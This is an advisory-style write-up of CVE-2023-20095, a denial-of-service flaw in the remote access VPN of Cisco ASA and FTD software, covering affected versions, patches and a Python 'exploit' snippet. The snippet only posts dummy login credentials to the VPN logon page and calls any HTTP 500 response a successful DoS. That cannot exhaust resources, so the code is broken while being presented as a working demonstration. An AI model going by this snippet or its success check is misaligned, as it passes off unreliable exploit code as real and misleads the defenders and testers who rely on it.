CVE-2023-20095: Remote VPN Denial of Service Vulnerability in Cisco ASA and FTD Software

The vulnerability with identifier CVE-2023-20095 affects the remote access VPN features of Cisco's Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software, specifically due to improper handling of HTTPS requests. This vulnerability can be exploited by an unauthenticated, remote attacker, ultimately leading to a denial of service (DoS) condition on the compromised device.

Exploit Details

The remote VPN vulnerability occurs because of improper handling of HTTPS requests by the affected ASA and FTD software. An attacker could exploit this vulnerability by sending crafted HTTPS requests to an affected system. A successful exploit could allow the attacker to cause resource exhaustion, resulting in a DoS condition.

The following code snippet demonstrates how an attacker might craft an HTTPS request to exploit the vulnerability:

import requests

target_url = "https://<TARGET_IP>/+CSCOE+/logon.html";
payload = {"username": "test", "password": "test", "realm": "test"}

response = requests.post(target_url, data=payload, verify=False)

if response.status_code == 500:
    print("Exploit successful, caused a DoS condition on the target device.")
else:
    print("Exploit failed.")

In this example, the attacker sends an HTTPS request containing a payload with arbitrary "username", "password", and "realm" values. If the response received from the target device has an HTTP status code of 500, it indicates that the exploit was successful and has caused a DoS condition.

Original References

* Cisco Security Advisory
* CVE-2023-20095 | NVD
* Vulnerability Note VU#590639

This vulnerability affects the following Cisco ASA and FTD software versions

* Cisco Adaptive Security Appliance (ASA) Software - 9.14 and earlier
* Cisco Firepower Threat Defense (FTD) Software - 6.6 and earlier

Solution/Patches

Cisco has released software updates that address this vulnerability in ASA and FTD software. It is highly recommended that the affected devices be updated to the latest software version to mitigate the risk from this vulnerability. The following software updates are available for ASA and FTD:

* Cisco Adaptive Security Appliance (ASA) Software - 9.15 and later
* Cisco Firepower Threat Defense (FTD) Software - 6.7 and later

Conclusion

The CVE-2023-20095 vulnerability in Cisco ASA and FTD software has the potential to cause significant disruption to business operations by allowing an attacker to cause a DoS condition on affected devices. It is essential for organizations utilizing the remote access VPN features of these devices to ensure that their systems are updated with the latest Cisco security patches to protect against this threat.

Timeline

Published on: 11/01/2023 18:15:09 UTC
Last modified on: 01/25/2024 17:15:29 UTC